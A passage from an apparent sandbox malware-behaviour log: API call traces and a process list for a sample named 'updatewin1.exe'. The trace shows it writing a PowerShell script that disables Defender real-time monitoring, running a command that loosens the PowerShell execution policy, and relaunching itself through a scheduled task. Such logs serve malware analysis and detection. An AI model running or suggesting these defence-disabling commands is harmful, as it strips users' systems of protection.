(HeapHandle=0x5b0000, Flags=0x8, Size=0x30) returned 0x5c5310 [0083.984] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2e) returned 0x5c5348 [0083.984] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1c) returned 0x5dbd40 [0083.985] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xd2) returned 0x5dc540 [0083.985] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x7c) returned 0x5dc620 [0083.985] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x36) returned 0x5dc6a8 [0083.985] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3a) returned 0x5dc6e8 [0083.985] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x90) returned 0x5dc730 [0083.985] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x24) returned 0x5dc7c8 [0083.985] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x30) returned 0x5c5380 [0083.985] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x36) returned 0x5dc7f8 [0083.985] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x48) returned 0x5dc838 [0083.985] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x52) returned 0x5dc888 [0083.985] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3c) returned 0x5dd818 [0083.985] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x82) returned 0x5dc8e8 [0083.985] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2e) returned 0x5c53b8 [0083.985] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1e) returned 0x5dbd68 [0083.985] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2c) returned 0x5c53f0 [0083.985] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x54) returned 0x5dc978 [0083.985] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x52) returned 0x5dc9d8 [0083.985] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2a) returned 0x5c5428 [0083.985] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3c) returned 0x5dd860 [0083.985] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x54) returned 0x5dca38 [0083.985] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x24) returned 0x5dca98 [0083.985] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x30) returned 0x5c5460 [0083.985] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x8c) returned 0x5dcac8 [0083.985] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5dcd28 | out: hHeap=0x5b0000) returned 1 [0083.985] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x800) returned 0x5dcb60 [0083.986] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0083.986] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x402ae4) returned 0x404e59 [0084.021] GetStartupInfoW (in: lpStartupInfo=0x18f578 | out: lpStartupInfo=0x18f578*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0084.023] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe\" --Admin" [0084.023] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe\" --Admin", pNumArgs=0x18e580 | out: pNumArgs=0x18e580) returned 0x5dd368*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe" [0084.023] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x18d8ec | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0084.079] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="script.ps1" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\script.ps1") returned 1 [0084.079] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\script.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\script.ps1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa8 [0084.081] lstrcpyA (in: lpString1=0x18e0ec, lpString2="Set-MpPreference -DisableRealtimeMonitoring $true" | out: lpString1="Set-MpPreference -DisableRealtimeMonitoring $true") returned="Set-MpPreference -DisableRealtimeMonitoring $true" [0084.081] lstrlenA (lpString="Set-MpPreference -DisableRealtimeMonitoring $true") returned 49 [0084.081] WriteFile (in: hFile=0xa8, lpBuffer=0x18e0ec*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x18d8e8, lpOverlapped=0x0 | out: lpBuffer=0x18e0ec*, lpNumberOfBytesWritten=0x18d8e8*=0x31, lpOverlapped=0x0) returned 1 [0084.082] CloseHandle (hObject=0xa8) returned 1 [0084.083] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x70) returned 0x5decd8 [0084.083] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x90) returned 0x5ded50 [0084.083] SetLastError (dwErrCode=0x0) [0084.083] lstrcpyW (in: lpString1=0x18d4e0, lpString2="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned" | out: lpString1="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned") returned="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned" [0084.083] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18d498*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18d488 | out: lpCommandLine="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned", lpProcessInformation=0x18d488*(hProcess=0xa4, hThread=0xa8, dwProcessId=0x8b8, dwThreadId=0x8cc)) returned 1 [0084.410] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.464] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.467] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.482] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.500] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.728] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.739] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.749] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.763] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.778] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.806] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.814] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.825] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.843] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.857] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.872] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.890] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.903] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.919] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.935] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.950] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.965] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0085.083] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0085.139] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0085.234] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0085.337] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0085.441] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0085.541] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0085.620] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0085.766] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0085.830] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0085.904] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0086.036] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0086.120] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0086.245] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0086.353] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0086.496] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0086.560] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0086.637] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0086.746] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0086.842] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0091.043] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0091.106] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0091.194] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0091.354] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0091.445] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0091.511] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0091.553] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0091.602] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0091.647] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0091.752] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0091.837] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0091.944] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0092.039] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0092.136] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0092.244] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0092.383] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0092.935] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.033] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.132] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.255] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.677] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0094.984] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0095.108] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0095.297] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0097.541] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) Process: id = "11" image_name = "powershell.exe" filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x30e9d000" os_pid = "0x8b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x868" cmd_line = "powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 56 os_tid = 0x8cc Thread: id = 61 os_tid = 0x970 Thread: id = 63 os_tid = 0x990 Thread: id = 112 os_tid = 0xb20 Process: id = "12" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x31d14000" os_pid = "0x92c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "created_scheduled_job" parent_id = "5" os_parent_pid = "0x370" cmd_line = "taskeng.exe {3EECB706-7466-497F-85A8-9F52E033D58C} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:LUA[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 58 os_tid = 0x93c Thread: id = 59 os_tid = 0x94c Thread: id = 60 os_tid = 0x95c Thread: id = 62 os_tid = 0x980 Thread: id = 64 os_tid = 0x9a0 Thread: id = 65 os_tid = 0x9b0 Thread: id = 66 os_tid = 0x9d0 Process: id = "13" image_name = "243e.tmp.exe.del105265203.del105731312.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\dfa6d923-216a-4d3a-9d72-28b7181f1996\\243e.tmp.exe.del105265203.del105731312.exe" page_root = "0x2ffbf000" os_pid = "0x9e0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0x92c" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\dfa6d923-216a-4d3a-9d72-28b7181f1996\\243E.TMP.EXE.DEL105265203.DEL105731312.exe\" --Task" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 110 os_tid = 0xaf0 Thread: id = 111 os_tid = 0x9f0 Process: id = "14" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x8f04000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "12" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cc7d" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 67 os_tid = 0xb74 Thread: id = 68 os_tid = 0x67c Thread: id = 69 os_tid = 0x388 Thread: id = 70 os_tid = 0x514 Thread: id = 71 os_tid = 0x318 Thread: id = 72 os_tid = 0x638 Thread: id = 73 os_tid = 0x25c Thread: id = 74 os_tid = 0x794 Thread: id = 75 os_tid = 0x7a4 Thread: id = 76 os_tid = 0x6d0 Thread: id = 77 os_tid = 0x504 Thread: id = 78 os_tid = 0x7ac Thread: id = 79 os_tid = 0x630 Thread: id = 80 os_tid = 0x524 Thread: id = 81 os_tid = 0x64 Thread: id = 82 os_tid = 0x40c Thread: id = 83 os_tid = 0x798 Thread: id = 84 os_tid = 0x7dc Thread: id = 85 os_tid = 0x344 Thread: id = 86 os_tid = 0x7e8 Thread: id = 87 os_tid = 0x11c Thread: id = 88 os_tid = 0x41c Thread: id = 89 os_tid = 0x618 Thread: id = 90 os_tid = 0x5fc Thread: id = 91 os_tid = 0x5f4 Thread: id = 92 os_tid = 0x5ec Thread: id = 93 os_tid = 0x5d0 Thread: id = 94 os_tid = 0x5c4 Thread: id = 95 os_tid = 0x5c0 Thread: id = 96 os_tid = 0x59c Thread: id = 97 os_tid = 0x480 Thread: id = 98 os_tid = 0x45c Thread: id = 99 os_tid = 0x43c Thread: id = 100 os_tid = 0x414 Thread: id = 101 os_tid = 0x410 Thread: id = 102 os_tid = 0xf0 Thread: id = 103 os_tid = 0xc8 Thread: id = 104 os_tid = 0x3f4 Thread: id = 105 os_tid = 0x3e8 Thread: id = 106 os_tid = 0x39c Thread: id = 107 os_tid = 0x390 Thread: id = 108 os_tid = 0x37c Thread: id = 109 os_tid = 0x374